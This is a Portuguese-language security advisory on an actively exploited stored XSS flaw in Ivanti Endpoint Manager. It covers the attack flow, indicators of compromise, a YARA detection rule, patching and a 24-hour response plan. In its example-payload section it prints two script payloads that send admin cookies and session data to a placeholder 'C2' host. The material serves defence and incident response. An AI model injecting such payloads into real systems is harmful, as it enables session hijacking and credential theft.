ID: CYB-INT-2026-0310-001 • Prioridade: CRÍTICA (Exploração Ativa) • Status: Patch Disponível | KEV CISA (Prazo: 23/03/2026)
Resumo Executivo
A vulnerabilidade CVE-2026-1603 no Ivanti Endpoint Manager (EPM) permite a atacantes remotos não autenticados bypass de autenticação via XSS armazenado de baixa complexidade, resultando em roubo de sessões e credenciais de usuários administrativos. A CISA adicionou a falha ao catálogo KEV em 09/03/2026 após evidências de exploração ativa, com +700 instâncias expostas globalmente (telemetria Shadowserver).
Recomendação imediata: Aplicar EPM 2024 SU5 hoje; desexpor consoles à internet via VPN/GW.
Ficha Rápida da Falha
Detalhes Técnicos
A CVE-2026-1603 afeta o console de administração do Ivanti Endpoint Manager. Atacantes remotos sem
privilégios podem injetar scripts persistentes (XSS armazenado) em endpoints de upload de documentos ou
comentários, como /rs/api/v1/admin/documents. A baixa complexidade do ataque e a ausência
de necessidade de interação tornam a falha particularmente perigosa.
O impacto primário é a captura de cookies de sessão (JSESSIONID), tokens JWT e credenciais
de administradores que acessam a página infectada. Com a sessão roubada, o atacante pode escalar para
deploy de payloads via API administrativa.
Fluxo de Ataque Típico (Reconstruído via Telemetria)
- 1. Enumeração: Scan de portas 443/8443 + fingerprinting de
/rs/api/v1/system/info - 2. Injeção: POST com payload XSS em endpoint não sanitizado
- 3. Persistência: Espera por admin acessar dashboard → exfil de sessão via beacon para C2
- 4. Escalação: Uso de sessão roubada para deploy de payload (ex: Cobalt Strike via API)
Payload de Exemplo (Conceitual)
// Payload XSS armazenado injetado em metadados de documento
<script>document.location='http://C2/?'+document.cookie</script>
// Variante com exfiltração via fetch
<script>fetch('/api/session').then(r=>r.text()).then(d=>
fetch('https://C2/collect',{method:'POST',body:d}))</script>Indicadores de Comprometimento (IoCs)
/rs/api/v1/admin/documents
/rs/api/v1/entry/applicationsMozilla/5.0 (compatible; ivanti-scanner/1.0)45.141.86[.]0/24 (RU-based)
193.56.29[.]0/24 (RU-based)YARA Rule Sugerida (para logs Apache/Nginx)
rule Ivanti_EPM_CVE_2026_1603 {
strings:
$s1 = "/rs/api/v1/admin/documents" ascii
$s2 = "fetch('/api/session')" ascii
condition:
all of them
}Impacto e Setores Afetados
- Escala Global: +700 hosts expostos (América do Norte 62%, Europa 28%, LATAM 5%)
- Brasil/LATAM: Comum em MSSPs e corporações com MDM (saúde, finanças, gov)
- Roubo de credenciais → Movimentação lateral em MDM
- Persistência em endpoints gerenciados (milhares de dispositivos)
- Chain com outras CVEs Ivanti (ex: CVE-2024-21887) para RCE
Mitigações e Recomendações
1. Patch Imediato
Atualize para EPM 2024 SU5 ou superior:
# Via CLI Ivanti (exemplo)
/opt/ivanti/tomcat/bin/update.sh -u https://downloads.ivanti.com/...2. Desexposição
- Bloqueie 443/8443 na WAN; force VPN ou IP Whitelist
- Ative WAF com regras anti-XSS (ModSecurity OWASP CRS)
3. Detecção
- Logs: Monitorar 403/500 em
/rs/api/v1/admin/* - EDR: Beaconing para IPs RU/CN pós-login admin
- Aplicar regra YARA sugerida em logs de acesso
4. Resposta
- Rotacionar todas as sessões/tokens de administradores
- Hunt em endpoints por payloads Lumma/Quasar (comum pós-EPM)
- Revisar logs retroativos por acesso anômalo ao console
Plano de Resposta em 24 Horas
- 0-2h: Inventariar instâncias Ivanti EPM, verificar versão e exposição WAN
- 2-8h: Aplicar EPM 2024 SU5, validar console autenticado, ativar WAF
- 8-16h: Rotacionar credenciais admin, invalidar sessões, reforçar EDR
- 16-24h: Revisar logs retroativos (30 dias), gerar evidências, atualizar runbooks
Fontes Primárias
- BleepingComputer: CISA Confirms Active Exploitation
- The Hacker News: CISA KEV Update
- CISA KEV Catalog
- Ivanti Advisory (VDP)